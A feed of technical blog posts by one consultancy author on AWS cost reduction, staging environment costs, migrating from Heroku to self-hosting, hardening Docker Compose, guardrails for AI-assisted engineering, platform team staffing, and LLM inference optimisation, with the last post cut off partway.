Forem: Yash Pritwani

We Audited 12 Startups' AWS Bills — Average Waste: 43%

Yash Pritwani — Fri, 08 May 2026 06:00:46 +0000

Originally published on TechSaaS Cloud

We Audited 12 Startups' AWS Bills — Average Waste: 43%

Last quarter, we ran infrastructure cost audits for 12 startups (seed to Series B). The results were consistent and painful: every single one was wasting between 28% and 67% of their AWS spend.

Not because they were stupid. Because AWS makes it trivially easy to provision resources and quietly expensive to maintain them.

Here's exactly what we found and how to fix it in 45 minutes.

The 5 Biggest Cost Leaks (In Order of Impact)

1. NAT Gateway Charges: The Silent $540/Month Tax

Every startup we audited was running 3 NAT Gateways (one per AZ) at $180/month each — $540/month for outbound internet traffic routing.

The reality: A 4-person engineering team with a single-service backend does not need multi-AZ redundancy for NAT. Your app server can tolerate a single NAT Gateway. If it goes down, requests retry.

The fix: Reduce to 1 NAT Gateway in your primary AZ. If your app is truly multi-AZ critical, use VPC endpoints for AWS services (S3, DynamoDB, SQS) to eliminate NAT traffic for internal AWS calls.

Savings: $360/month (67% reduction in NAT costs)

2. Oversized RDS Instances: Paying for 12x the CPU You Need

8 out of 12 startups were running db.r5.xlarge or larger ($800+/month) with CPU utilization under 10%.

Why this happens: The RDS instance wizard defaults to production-grade instances. Developers pick "recommended" and forget. RDS has no auto-downsize.

The fix:

# Check your actual utilization
aws cloudwatch get-metric-statistics \
  --namespace AWS/RDS \
  --metric-name CPUUtilization \
  --dimensions Name=DBInstanceIdentifier,Value=YOUR_DB \
  --start-time $(date -d '30 days ago' --iso-8601) \
  --end-time $(date --iso-8601) \
  --period 86400 \
  --statistics Average Maximum

If your P99 CPU is under 40%, drop one instance class. Under 20%? Drop two.

A db.t3.medium ($70/month) handles most startup workloads beautifully until you hit 500+ concurrent connections.

Savings: $500-730/month per instance

3. CloudWatch Log Retention: Paying Forever for Logs Nobody Reads

Default log retention: Never expire. Cost: $0.03/GB/month stored, $0.50/GB ingested.

One startup had 4TB of CloudWatch logs going back to 2023. Cost: $120/month storage + $200/month ingestion for verbose DEBUG logs in production.

The fix:

# Set 14-day retention on all log groups
aws logs describe-log-groups --query 'logGroups[].logGroupName' --output text | \
  xargs -I {} aws logs put-retention-policy --log-group-name {} --retention-in-days 14

For long-term analysis, export to S3 ($0.023/GB/month — 75% cheaper) and query with Athena on-demand.

Savings: $200-400/month

4. Orphaned EBS Snapshots: Ghost Costs From Deleted Instances

When you terminate an EC2 instance, its EBS snapshots stay. Silently. At $0.05/GB/month.

The find script:

# Find snapshots with no matching volume
aws ec2 describe-snapshots --owner-ids self \
  --query 'Snapshots[?!VolumeId].{ID:SnapshotId,Size:VolumeSize,Created:StartTime}' \
  --output table

One client: 2.3TB of orphaned snapshots. $115/month for dead data.

Savings: $50-230/month

5. Load Balancers for Internal Services: $16/Month Each for Nothing

Every ALB costs $16/month base + traffic charges. We found startups running 4-6 ALBs for services that only communicate internally.

The fix: Replace internal ALBs with:

Docker service DNS (free, already works in compose/swarm)
AWS Cloud Map for service discovery ($0.10/month per service)
Or simply direct IP/port references behind a VPC

Savings: $64-96/month

The 45-Minute Audit Process

You can run this yourself. Right now.

Step 1 (10 min): Export Cost Explorer data

aws ce get-cost-and-usage \
  --time-period Start=$(date -d '90 days ago' +%Y-%m-%d),End=$(date +%Y-%m-%d) \
  --granularity MONTHLY \
  --metrics "UnblendedCost" \
  --group-by Type=DIMENSION,Key=SERVICE \
  --output json > cost-report.json

Step 2 (15 min): Map utilization vs. provisioned

RDS: CloudWatch CPU/memory utilization
EC2: CPU, network I/O
Lambda: concurrent executions vs. provisioned concurrency

Step 3 (10 min): Find zombies

Unattached EBS volumes
Orphaned snapshots
Unused Elastic IPs ($3.60/month each when unattached)
Idle load balancers (0 requests/day)

Step 4 (10 min): Calculate savings

Right-size instances (match actual utilization + 30% headroom)
Eliminate orphaned resources
Set retention policies
Remove unnecessary redundancy

Results Across 12 Audits

Startup Stage	Monthly AWS	Waste Found	Post-Audit Cost
Pre-seed (2 eng)	$800	52%	$384
Seed (5 eng)	$2,400	43%	$1,368
Series A (12 eng)	$5,100	38%	$3,162
Series B (25 eng)	$12,000	41%	$7,080

Average savings: 43%. Zero performance impact. Zero downtime.

When Self-Hosting Makes More Sense

If your post-audit AWS bill is still above $2,000/month for a straightforward stack (web app + DB + cache + queue), self-hosting may save you another 80-90%.

We run 84 containers for $45/month on a single Proxmox node. Same stack that costs $2,400 on AWS.

That's a different conversation — but the audit comes first. Know your real spend before deciding your platform strategy.

Get Your Free Audit

We do free 15-minute cloud cost reviews. No pitch, no obligation. We screen-share, run the commands above against your account, and tell you exactly what you're wasting.

Book a slot: techsaas.cloud/contact

Or run the audit yourself with our free PDF checklist that includes all the CLI commands above plus 12 more checks we run.

Your Staging Environment Costs More Than Production — And Nobody Notices

Yash Pritwani — Fri, 08 May 2026 06:00:44 +0000

Originally published on TechSaaS Cloud

Your Staging Environment Costs More Than Production — And Nobody Notices

In 8 out of our last 10 infrastructure audits, the staging environment cost more than production. Not by a little — often 30-50% more.

Nobody noticed because staging bills get lumped into "infrastructure costs" and nobody questions them.

How Staging Sneaks Past Production

Here's the typical pattern:

When production was set up: careful capacity planning, right-sized instances, auto-scaling configured, alarms set.

When staging was set up: "Just copy the production config so it's a faithful replica."

And then:

Factor	Production	Staging
Instance size	t3.xlarge (right-sized)	t3.xlarge (copied from prod)
Traffic	50K requests/day	200 requests/day
Running hours	24/7 (needed)	24/7 (nobody turned it off)
Auto-scaling	Configured	Copied but never triggers
Data retention	30-day rotation	"Never expire" (nobody set policy)
Snapshots	Weekly, pruned	Daily (default), never pruned

Production was optimized. Staging was forgotten.

The Real Cost Comparison

One client's actual AWS bill breakdown:

Production Environment:
  EC2 (auto-scaled):    $480/mo
  RDS (t3.medium):      $70/mo
  ElastiCache:          $150/mo
  ALB:                  $25/mo
  CloudWatch:           $45/mo
  EBS + Snapshots:      $60/mo
  NAT Gateway:          $180/mo
  ─────────────────────────────
  Total:                $1,010/mo

Staging Environment:
  EC2 (same size, no scaling): $720/mo  ← bigger because no auto-scale down
  RDS (r5.large "just in case"): $400/mo  ← someone picked a bigger instance
  ElastiCache:          $150/mo
  ALB:                  $25/mo
  CloudWatch:           $120/mo  ← verbose logging nobody reads
  EBS + Snapshots:      $180/mo  ← daily snapshots, never pruned
  NAT Gateway:          $180/mo
  ─────────────────────────────
  Total:                $1,775/mo  ← 76% MORE than production

Staging: $1,775/mo. Production: $1,010/mo. For an environment that handles 0.4% of the traffic.

Fix 1: Schedule-Based Shutdown (65% Savings Immediately)

Your staging environment doesn't need to run at 3 AM on Sunday.

# AWS Lambda function triggered by EventBridge schedule
# Stop staging at 8 PM, start at 8 AM, weekdays only

# Stop Rule (cron: 0 20 ? * MON-FRI *)
aws ec2 stop-instances --instance-ids i-staging-web i-staging-worker

# Start Rule (cron: 0 8 ? * MON-FRI *)
aws ec2 start-instances --instance-ids i-staging-web i-staging-worker

Running hours: 24/7 = 720 hours/month → Weekday 8-8 = 240 hours/month.

Savings: 67% reduction on compute costs. Immediately. No impact on anyone.

For Docker-based staging, even simpler:

# Crontab on staging server
0 20 * * 1-5 docker compose -f docker-compose.staging.yml stop
0 8  * * 1-5 docker compose -f docker-compose.staging.yml start

Fix 2: Right-Size Staging Instances (Additional 50-70% Savings)

Staging doesn't need production capacity. It needs enough to run your test suite and let QA click through flows.

Rule of thumb: Staging instances should be 2 instance classes below production.

Production	Staging	Monthly Savings
t3.xlarge ($120/mo)	t3.small ($15/mo)	$105 (87%)
r5.large ($180/mo)	t3.medium ($30/mo)	$150 (83%)
m5.2xlarge ($280/mo)	t3.large ($60/mo)	$220 (78%)

"But staging should mirror production!" No. Staging should mirror production's architecture, not its capacity. Same services, same networking, same config — smaller instances.

If your app works on a t3.small, it'll work on a t3.xlarge. The reverse is also true. Instance size doesn't affect correctness.

Fix 3: Ephemeral Staging (90%+ Savings)

The best staging environment is one that doesn't exist until you need it.

# GitHub Actions: spin up staging per PR
name: PR Staging
on:
  pull_request:
    types: [opened, synchronize]

jobs:
  staging:
    runs-on: ubuntu-latest
    steps:
      - name: Deploy ephemeral staging
        run: |
          docker compose -f docker-compose.staging.yml up -d
          echo "Staging URL: https://pr-${{ github.event.number }}.staging.example.com"

      - name: Run E2E tests
        run: npm run test:e2e -- --base-url https://pr-${{ github.event.number }}.staging.example.com

Cost: Only pay when PRs are open. No PR, no staging, no cost.

Combined Savings

Fix	Savings	Effort
Schedule-based shutdown	65%	30 minutes
Right-size instances	50-70% on remaining	1 hour
Combined	~90%	1.5 hours
Ephemeral (advanced)	95%+	Half day

For our client: $1,775/mo → $180/mo. 90% reduction. 90 minutes of work.

The Meta-Problem: Nobody Owns Staging Costs

This happens because:

Dev team provisions staging — optimized for "works like prod"
Finance sees one "AWS" line item — doesn't break down by environment
Nobody reviews staging specifically — it's invisible

Fix the process: Add environment tags to every AWS resource. Set up a Cost Explorer view that splits by environment. Review monthly.

# Tag all staging resources
aws ec2 create-tags --resources i-xxxxx \
  --tags Key=Environment,Value=staging

Then in Cost Explorer, group by the Environment tag. You'll immediately see the problem.

Free Environment Audit

We'll review your AWS environments (prod, staging, dev) and show you exactly where the waste is. 15 minutes, free, no pitch.

Book a slot: techsaas.cloud/contact

Complete PaaS Exit Playbook: Heroku to Self-Hosted in 72 Hours

Yash Pritwani — Fri, 08 May 2026 06:00:09 +0000

Originally published on TechSaaS Cloud

Complete PaaS Exit Playbook: Heroku to Self-Hosted in 72 Hours

We've migrated 6 startups off Heroku and Render in the past year. Average cost reduction: 87%. No client has gone back.

This is the exact playbook we use. Three days, start to finish.

The Economics That Force the Move

Here's a real client breakdown (Series A, Rails app, ~5K DAU):

Heroku Item	Monthly Cost
4× Performance-M Dynos	$1,000
Heroku Postgres (Standard-0)	$50
Heroku Redis (Premium-0)	$200
Heroku Data for Redis	$200
Papertrail (logging)	$230
Scout APM	$120
Heroku CI	$100
SSL, Scheduler, misc add-ons	$900
Total	$2,800/mo

The replacement:

Self-Hosted Item	Monthly Cost
Hetzner CX41 (16GB RAM, 4 vCPU)	$15
Hetzner managed Postgres	$25
Backblaze B2 backups	$5
Domain + DNS (Cloudflare free)	$0
Monitoring (Grafana + Prometheus, self-hosted)	$0
CI/CD (Gitea Actions, self-hosted)	$0
Uptime monitoring (Uptime Kuma, self-hosted)	$0
Total	$45/mo

Actual client paid $240/mo because they chose managed Postgres on a larger plan and a beefier server for headroom. Still 91% savings.

Day 1: Containerize (8 hours)

Step 1: Create a Dockerfile

If you're on Heroku, you likely have a Procfile. The translation is direct:

# Heroku Procfile: web: bundle exec puma -C config/puma.rb
# Docker equivalent:

FROM ruby:3.2-slim AS base
WORKDIR /app

# Install dependencies
RUN apt-get update && apt-get install -y \
  build-essential libpq-dev nodejs npm && \
  rm -rf /var/lib/apt/lists/*

COPY Gemfile Gemfile.lock ./
RUN bundle install --deployment --without development test

COPY . .
RUN bundle exec rake assets:precompile

# Production stage
FROM ruby:3.2-slim
WORKDIR /app

RUN apt-get update && apt-get install -y libpq-dev && \
  rm -rf /var/lib/apt/lists/*

COPY --from=base /app /app

USER 1000:1000
EXPOSE 3000
CMD ["bundle", "exec", "puma", "-C", "config/puma.rb"]

Step 2: Create docker-compose.yml

services:
  app:
    build: .
    user: "1000:1000"
    ports:
      - "127.0.0.1:3000:3000"
    environment:
      - DATABASE_URL=postgres://app:${DB_PASS}@postgres:5432/app_prod
      - REDIS_URL=redis://redis:6379/0
      - RAILS_ENV=production
      - SECRET_KEY_BASE=${SECRET_KEY}
    depends_on:
      - postgres
      - redis
    deploy:
      resources:
        limits:
          memory: 1G
          cpus: '2.0'
    networks:
      - backend

  postgres:
    image: postgres:16-alpine
    user: "999:999"
    volumes:
      - pgdata:/var/lib/postgresql/data
    environment:
      - POSTGRES_PASSWORD=${DB_PASS}
      - POSTGRES_DB=app_prod
    deploy:
      resources:
        limits:
          memory: 1G
    networks:
      - backend

  redis:
    image: redis:7-alpine
    volumes:
      - redisdata:/data
    deploy:
      resources:
        limits:
          memory: 256M
    networks:
      - backend

  traefik:
    image: traefik:v3
    ports:
      - "443:443"
      - "80:80"
    volumes:
      - /var/run/docker.sock:/var/run/docker.sock:ro
      - ./traefik:/etc/traefik
    networks:
      - backend

volumes:
  pgdata:
  redisdata:

networks:
  backend:

Step 3: Test locally

docker compose up --build
# Hit localhost:3000, verify everything works
# Run your test suite against Docker

Day 2: Provision and Migrate Data (8 hours)

Step 1: Provision the server

# Hetzner CLI (or use their web UI)
hcloud server create \
  --name prod-01 \
  --type cx41 \
  --image ubuntu-24.04 \
  --ssh-key my-key \
  --location nbg1

Step 2: Bootstrap the server

# SSH in and run
apt update && apt upgrade -y
apt install -y docker.io docker-compose-v2
systemctl enable docker

# Create deploy user
useradd -m -s /bin/bash deploy
usermod -aG docker deploy

# Set up firewall
ufw allow 22/tcp
ufw allow 80/tcp
ufw allow 443/tcp
ufw enable

Step 3: Migrate the database

# Export from Heroku
heroku pg:backups:capture --app your-app
heroku pg:backups:download --app your-app

# Import to new Postgres
docker compose up -d postgres
docker compose exec -T postgres pg_restore \
  -U postgres -d app_prod < latest.dump

Step 4: Migrate files/assets

If using Heroku's ephemeral filesystem, you're probably already on S3. Just update the credentials in your env.

If using Heroku's built-in file storage... that data is gone on every deploy anyway. Nothing to migrate.

Day 3: Go Live (4 hours)

Step 1: Deploy and verify

# On the server
docker compose up -d
docker compose logs -f app  # Watch for startup errors

# Health check
curl -s https://your-domain.com/health | jq .

Step 2: Set up CI/CD

# .gitea/workflows/deploy.yml (or .github/workflows)
name: Deploy
on:
  push:
    branches: [main]

jobs:
  deploy:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: Deploy
        run: |
          ssh deploy@your-server "cd /app && git pull && docker compose up -d --build"

Now git push deploys — same as Heroku.

Step 3: Flip DNS

# Update your domain's A record to the new server IP
# TTL: start at 60 seconds, increase after verification

Step 4: Monitor for 48 hours

Keep Heroku running for 48 hours as rollback. Watch:

Response times (should be same or faster)
Error rates
Database connections
Memory/CPU usage

What You Keep

Heroku Feature	Self-Hosted Equivalent
`git push` deploy	CI/CD pipeline (2 minutes)
Auto-SSL (ACM)	Traefik + Let's Encrypt (automatic)
Rollbacks	`docker compose up -d --build` previous commit
Logging	Loki + Grafana (better than Papertrail)
Metrics	Prometheus + Grafana (better than Scout)
Scaling	Docker Compose replicas

What You Gain

Full control — no vendor can change pricing under you
10x capacity headroom — a $15/month server handles more than 4 Heroku dynos
Better debugging — SSH into the box, inspect everything
No add-on tax — every Heroku add-on has a free self-hosted alternative

When NOT to Self-Host

Be honest with yourself:

No ops experience and no budget to learn: Stay on PaaS until you have someone who can SSH into a server confidently
Compliance requirements: Some industries require specific cloud certifications
True auto-scaling needs: If you go from 100 to 100,000 requests in seconds, managed infrastructure is worth it

For the other 90% of startups: you're overpaying for convenience you've already outgrown.

Free Migration Assessment

Not sure if migration makes sense for your stack? We'll review your current Heroku/Render setup, estimate your self-hosted costs, and give you an honest recommendation in 15 minutes.

Book a call: techsaas.cloud/contact

The 5-Minute Docker Compose Security Checklist We Run for Every Client

Yash Pritwani — Fri, 08 May 2026 06:00:06 +0000

Originally published on TechSaaS Cloud

The 5-Minute Docker Compose Security Checklist We Run for Every Client

We've reviewed Docker Compose configurations for over 30 startups. These three security holes appear in every single one. Without exception.

They're trivial to fix. Most teams just never do because nobody tells them until something goes wrong.

Hole #1: Ports Bound to 0.0.0.0

The most common Docker Compose pattern:

services:
  postgres:
    image: postgres:16
    ports:
      - "5432:5432"  # ← This is 0.0.0.0:5432

That "5432:5432" is shorthand for "0.0.0.0:5432:5432". Your database is now accessible from every network interface — including the public internet if your host has a public IP.

We've seen production Postgres instances exposed to the internet with default credentials. One client's Redis was mining crypto for 3 days before anyone noticed.

The Fix

services:
  postgres:
    image: postgres:16
    ports:
      - "127.0.0.1:5432:5432"  # ← Only accessible from localhost

For services that only talk to each other via Docker network, remove the port binding entirely:

services:
  postgres:
    image: postgres:16
    # No ports section at all — only reachable via Docker internal DNS
    networks:
      - backend

Rule: Only expose ports you need from outside Docker. If the service is internal-only, don't map it.

Hole #2: Running as Root

Check your running containers right now:

docker compose exec app whoami
# Output: root

If an attacker achieves container escape (CVE-2024-21626 in runc, for example), they land on the host as root. Full control. Game over.

The Fix

services:
  app:
    image: myapp:latest
    user: "1000:1000"
    security_opt:
      - no-new-privileges:true
    read_only: true
    tmpfs:
      - /tmp

What each line does:

user: "1000:1000" — runs as non-root UID
no-new-privileges — prevents privilege escalation via setuid binaries
read_only: true — container filesystem is immutable
tmpfs: /tmp — gives the app a writable temp directory without persistent write access

Common objection: "My app needs to write files." Use volumes for specific writable paths. Don't give the entire filesystem write access.

Hole #3: No Resource Limits

Without limits, a single container with a memory leak eats the entire host:

# Container using 14GB on a 16GB host
docker stats --no-stream
CONTAINER  CPU %  MEM USAGE / LIMIT     MEM %
app        340%   14.2GiB / 15.6GiB     91.03%

When this happens, the OOM killer starts murdering other containers. Your database goes down. Your monitoring goes down. Everything cascades.

The Fix

services:
  app:
    image: myapp:latest
    deploy:
      resources:
        limits:
          memory: 512M
          cpus: '1.0'
        reservations:
          memory: 256M
          cpus: '0.25'

Limits = hard ceiling. Container gets OOM-killed if it exceeds this.
Reservations = guaranteed minimum. Docker won't schedule other work into this space.

Rule of thumb: Set memory limit at 2x your app's normal working set. If your Node.js app uses 200MB normally, set limit to 512M. Enough headroom for spikes, tight enough to prevent runaway.

The Complete Hardened Template

Here's our baseline docker-compose.yml security config that we apply to every project:

services:
  app:
    image: myapp:latest
    user: "1000:1000"
    read_only: true
    security_opt:
      - no-new-privileges:true
    cap_drop:
      - ALL
    cap_add:
      - NET_BIND_SERVICE  # Only if binding port <1024
    tmpfs:
      - /tmp
    deploy:
      resources:
        limits:
          memory: 512M
          cpus: '1.0'
    networks:
      - backend
    # No port binding — reverse proxy handles external access

  postgres:
    image: postgres:16-alpine
    user: "999:999"  # postgres user UID
    read_only: true
    security_opt:
      - no-new-privileges:true
    cap_drop:
      - ALL
    volumes:
      - pgdata:/var/lib/postgresql/data
    tmpfs:
      - /tmp
      - /run/postgresql
    deploy:
      resources:
        limits:
          memory: 1G
          cpus: '2.0'
    networks:
      - backend
    # No ports exposed — app connects via Docker DNS

  traefik:
    image: traefik:v3
    ports:
      - "0.0.0.0:443:443"   # Only HTTPS exposed publicly
      - "127.0.0.1:8080:8080"  # Dashboard localhost only
    # ... rest of config

Bonus: Automated Scanning

Add this to your CI to catch these issues before deploy:

# Install docker-compose-linter
pip install docker-compose-linter

# Scan for security issues
docker-compose-lint --security docker-compose.yml

Or use Trivy for image scanning:

trivy config docker-compose.yml

How We Can Help

We run free 15-minute Docker security reviews. Share your docker-compose.yml (redact credentials), and we'll tell you exactly what's exposed, what's at risk, and how to fix it.

No pitch. Just fixes.

Book a review: techsaas.cloud/contact

The Three Inverse Laws of AI: What Every Engineering Team Needs to Know Before It's Too Late

Yash Pritwani — Thu, 07 May 2026 06:00:48 +0000

Originally published on TechSaaS Cloud

The Three Inverse Laws of AI: What Every Engineering Team Needs to Know

This concept recently hit the top of Hacker News, and it crystallizes something we've been seeing with our own AI infrastructure for months.

The three inverse laws:

The more AI helps you write code, the harder it becomes to understand what you shipped.
The more AI automates testing, the less your team knows when something is actually broken.
The more AI handles operations, the worse your incident response becomes when AI itself fails.

These aren't philosophical concerns. They're operational risks that scale with your AI adoption.

Law 1: The Comprehension Inverse

A startup we work with shipped 3x faster last quarter using AI-assisted coding. Their velocity metrics looked elite. Then they hit a production bug in AI-generated code — a subtle race condition in a connection pooling layer that no human on the team had written or reviewed deeply.

Debugging took 4 days instead of 4 hours. The code worked perfectly in isolation. It passed all AI-generated tests. But it wasn't written with human mental models, and nobody could trace the logic path that led to the race condition.

The Guardrail

Mandatory domain-context code review. Not syntax review — domain review. For every AI-generated module, one human must be able to explain:

Why this approach was chosen over alternatives
What the failure modes are
How it interacts with adjacent systems

If nobody can answer those questions, the code isn't ready for production — regardless of how clean it looks.

# Code review checklist for AI-generated code
REVIEW_QUESTIONS = [
    "Can you explain the algorithm without reading the code?",
    "What happens when the database is slow?",
    "What happens when the input is 10x larger than expected?",
    "Where does this code store state, and what happens on restart?",
    "If this breaks at 3am, what would you check first?",
]

Law 2: The Testing Inverse

AI-generated tests have a blind spot: they test what the AI thinks the code does, not what the code should do from a business perspective.

We saw this firsthand. Our AI agent generated 200+ unit tests for a billing module. All green. Coverage was 94%. But the tests were tautological — they verified the code did what the code did, not that it correctly calculated invoices according to the pricing model.

A human-written test caught that annual billing with mid-cycle upgrades was charging the wrong prorated amount. None of the 200 AI tests caught it because the AI had encoded the bug in both the code and the tests.

The Guardrail

Maintain a "canary test suite" written and maintained exclusively by humans. These tests encode business logic, edge cases, and invariants that must always hold true. They're the immune system that catches when AI-generated code and AI-generated tests both miss the same thing.

# Canary tests — HUMANS ONLY, never AI-generated
class BillingCanaryTests:
    def test_annual_upgrade_proration(self):
        """Business rule: mid-cycle upgrade prorates from upgrade date,
        not from billing cycle start. Finance confirmed 2026-01-15."""
        invoice = calculate_upgrade_proration(
            plan_from="starter", plan_to="growth",
            cycle_start=date(2026, 1, 1), upgrade_date=date(2026, 3, 15)
        )
        # 17 days of Growth pricing, not 75 days
        assert invoice.prorated_days == 17

The canary suite should be small (50-100 tests), focused on business-critical paths, and reviewed quarterly by product + engineering together.

Law 3: The Operations Inverse

This one hit us directly. We run 9 autonomous AI agents managing infrastructure, content, security, and operations. When the AI is working, everything is smooth — containers restart, configs update, incidents get triaged.

But when our orchestrator went down for 3 hours, the team was lost. Nobody remembered the manual procedure for restarting the Traefik proxy. Nobody knew which containers had health checks and which didn't. The muscle memory was gone because the AI had been handling everything for months.

The Guardrail

Quarterly "AI-off" drills. Disable your AI automation and practice manual operations. This is the engineering equivalent of a fire drill.

Schedule:

Monthly: One team member shadows the AI's operations decisions for a day, documenting what they'd do differently
Quarterly: Full "AI-off" drill for 2 hours — all AI automation paused, team handles operations manually
Annually: Full incident simulation without AI assistance

We implemented this after our orchestrator outage. The first drill was rough — MTTR was 4x worse without AI. By the third drill, the team had rebuilt enough manual competency that AI failures became inconveniences, not crises.

The Meta-Pattern: AI Amplifies, Doesn't Replace

The inverse laws share a root cause: treating AI as a replacement rather than an amplifier. When AI replaces human understanding, you've traded visible complexity for invisible fragility.

The correct model:

AI writes code → humans understand and own it
AI generates tests → humans maintain the canary suite
AI handles operations → humans practice without it

This isn't about slowing down. It's about building resilience at the speed of AI. The teams that get this right will ship 3x faster AND recover from failures in minutes. The teams that don't will ship 3x faster until the first major incident — and then spend weeks recovering.

Practical Implementation

For Engineering Managers

Add "AI comprehension review" to your PR checklist
Create a canary test suite with business-critical invariants
Schedule the first "AI-off" drill this quarter
Track "AI-generated code incident rate" as a team metric

For CTOs

Establish AI governance policies before the first inverse-law incident
Budget for human review time — AI coding speed is meaningless if review becomes the bottleneck
Ensure your incident response runbooks have manual fallbacks for every AI-automated step
Consider AI adoption pace relative to team comprehension capacity

For Individual Engineers

When AI generates code, read it as if a junior engineer wrote it — with skepticism
Write at least one test per feature that you'd bet your bonus on
Know how to do your job without AI tools — they will go down

Need help building AI guardrails for your engineering team? We run 9 autonomous agents in production and have learned these lessons the hard way. Book a consultation or explore our AI infrastructure services.

Platform Team Staffing Models: Dedicated vs Embedded vs Hybrid — A Decision Framework

Yash Pritwani — Thu, 07 May 2026 06:00:45 +0000

Originally published on TechSaaS Cloud

Platform Team Staffing Models: Dedicated vs Embedded vs Hybrid

You hired 6 platform engineers. Four of them are doing ticket work — resetting credentials, debugging CI pipelines, and answering Slack questions about why the staging environment is down again.

This isn't a people problem. It's a staffing model problem. The way you organize your platform team determines whether they build leverage or become an expensive help desk.

The Three Models

Model 1: Dedicated (Centralized) Platform Team

The entire platform team sits together, owns a shared roadmap, and builds platform capabilities as internal products.

How it works:

Platform team has its own backlog, sprint cycles, and product manager
Product teams submit requests through a self-service portal or queue
Platform engineers don't join product team standups or rituals

Best for:

Organizations with 5+ product teams
Mature platforms with established self-service tooling
Teams where platform work is clearly separable from product work

The risk: Ivory tower syndrome. The platform team builds what they think is important, not what product teams actually need. You end up with a beautifully engineered internal developer portal that nobody uses because it doesn't solve the real friction points.

Mitigation: Embed a product manager in the platform team. Their job is to interview product engineers monthly and translate pain points into platform roadmap items.

Model 2: Embedded (Distributed) Platform Engineers

Platform engineers are embedded in product teams, attending their standups and working on platform improvements within the product context.

How it works:

Each product team gets 0.5-1 platform engineer
They work on team-specific platform needs (CI/CD, observability, deployment)
Coordination happens through a "platform guild" — weekly sync, shared standards

Best for:

Early-stage platform teams (fewer than 4 platform engineers)
Organizations where product teams have very different platform needs
Situations where platform adoption is low and you need missionaries, not builders

The risk: Platform engineers go native. They become the product team's DevOps person, spending 80% of their time on product-specific work and 20% on platform improvements. After 6 months, you have 4 product-team DevOps engineers and no platform.

Mitigation: Enforce a 60/40 split — 60% platform work, 40% product-context work. The platform guild lead reviews allocation monthly.

Model 3: Hybrid (Core + Liaisons)

A small core team builds and maintains the platform. Each product cluster has a platform liaison who translates between product needs and platform capabilities.

How it works:

Core team (3-5 engineers) owns the platform roadmap and builds shared capabilities
Liaisons (1 per 2-3 product teams) attend product standups and surface friction
Liaisons route issues: simple ones they fix themselves, complex ones go to core team backlog
Monthly "platform review" where liaisons present top friction points to core team

Best for:

Mid-size organizations (50-200 engineers)
Organizations transitioning from embedded to dedicated model
Teams where platform maturity varies across product areas

The risk: Liaisons become bottlenecks. Product teams stop going to self-service and start going to their liaison for everything. The liaison becomes a human API gateway.

Mitigation: Liaisons must have a "teach, not do" mandate. If a product engineer asks the same question twice, the liaison's job is to build documentation or tooling — not answer the question again.

Decision Matrix

Factor	Dedicated	Embedded	Hybrid
Team size (platform)	6+	2-4	4-8
Product teams	5+	2-4	3-6
Platform maturity	High	Low	Medium
Self-service adoption	High	Low	Growing
Primary risk	Ivory tower	Going native	Liaison bottleneck

The Staffing Ratio

Based on industry data and our client work:

Early stage: 1 platform engineer per 8-10 product engineers
Growth stage: 1 per 10-15 product engineers
Mature stage: 1 per 15-25 product engineers (self-service reduces load)

If your ratio is lower than 1:8, you either have extraordinary platform needs or your platform team is doing product work.

Real-World Evolution

Most organizations go through this progression:

Phase 1 (0-30 engineers): No platform team. Senior engineers do DevOps part-time. This is fine.
Phase 2 (30-80 engineers): First 2-3 platform engineers, embedded in product teams. Focus: CI/CD, deployment, basic observability.
Phase 3 (80-200 engineers): Hybrid model. Core team builds self-service, liaisons drive adoption.
Phase 4 (200+ engineers): Dedicated platform team with product management. Self-service is the default.

Skipping phases causes pain. A 40-person company with a dedicated platform team will waste cycles building infrastructure nobody uses. A 200-person company with embedded platform engineers will have inconsistent tooling across every team.

The Metric That Tells You If It's Working

Track one number: percentage of platform requests resolved through self-service.

Below 30%: Your platform is a help desk. Invest in self-service tooling.
30-60%: Growing. Focus on documentation and the top 5 repeat requests.
60-80%: Healthy. Platform team can focus on capabilities, not support.
Above 80%: Mature. Consider reducing platform headcount or tackling harder problems.

Need help designing your platform team structure? We've helped organizations from 20 to 2000 engineers find the right model. Book a consultation or explore our platform engineering services.

LLM Inference Optimization: Batching, Quantization, and Speculative Decoding

Yash Pritwani — Thu, 07 May 2026 06:00:10 +0000

Originally published on TechSaaS Cloud

LLM Inference Optimization: Cut Costs 80% Without Cutting Quality

If you're serving LLM inference in production, you're probably paying 5-10x more than you need to. The default configurations of most serving frameworks optimize for simplicity, not efficiency.

Three techniques — continuous batching, quantization, and speculative decoding — can cut your inference costs by 80% and latency by 60%. Here's how each works and when to use them.

Technique 1: Continuous Batching

The Problem with Naive Batching

Traditional batching waits for N requests to arrive, then processes them together. This creates a latency-throughput tradeoff: small batches waste GPU cycles, large batches add waiting time.

Continuous Batching (Iteration-Level Scheduling)

Instead of batching at the request level, continuous batching schedules at the token level. New requests can join a running batch between token generations, and completed requests leave immediately.

# vLLM handles this automatically
from vllm import LLM, SamplingParams

llm = LLM(
    model="meta-llama/Llama-3-70B",
    tensor_parallel_size=4,
    max_num_batched_tokens=32768,  # Total tokens across all requests in batch
    max_num_seqs=256,              # Max concurrent sequences
)

Impact: 3-5x throughput improvement over naive batching. Latency for individual requests stays low because they don't wait for a full batch to form.

Benchmarks

Serving Framework	Requests/sec (Llama-3-70B)	P50 Latency	P99 Latency
Naive batching	12	2.1s	8.4s
vLLM (continuous)	47	0.8s	2.1s
TGI (continuous)	41	0.9s	2.4s

Technique 2: Quantization

Quantization reduces the precision of model weights from FP16 (16-bit) to INT8 or INT4, dramatically reducing memory usage and increasing inference speed.

The Tradeoff

Precision	Memory (70B model)	Speed vs FP16	Quality Loss
FP16	140GB	1x (baseline)	0%
INT8 (GPTQ)	70GB	1.5-2x	<1%
INT4 (AWQ)	35GB	2-3x	1-3%
INT4 (GGUF)	35GB	2-3x	1-5%

AWQ (Activation-aware Weight Quantization) is our recommendation for production. It preserves quality better than naive INT4 by identifying and protecting salient weight channels.

from vllm import LLM

# Serve a 70B model on a single A100 80GB (impossible with FP16)
llm = LLM(
    model="TheBloke/Llama-3-70B-AWQ",
    quantization="awq",
    tensor_parallel_size=1,  # Single GPU!
    gpu_memory_utilization=0.9,
)

When NOT to Quantize

Code generation models (precision matters for syntax)
Mathematical reasoning (quantization loses numerical precision)
Models smaller than 13B (the quality loss is proportionally larger)

Technique 3: Speculative Decoding

The insight: use a small, fast "draft" model to generate candidate tokens, then verify them in parallel with the large model. If the draft model is right (which it often is for common patterns), you get the speed of the small model with the quality of the large one.

from vllm import LLM, SamplingParams

llm = LLM(
    model="meta-llama/Llama-3-70B",
    speculative_model="meta-llama/Llama-3-8B",  # Draft model
    num_speculative_tokens=5,  # Generate 5 draft tokens per step
)

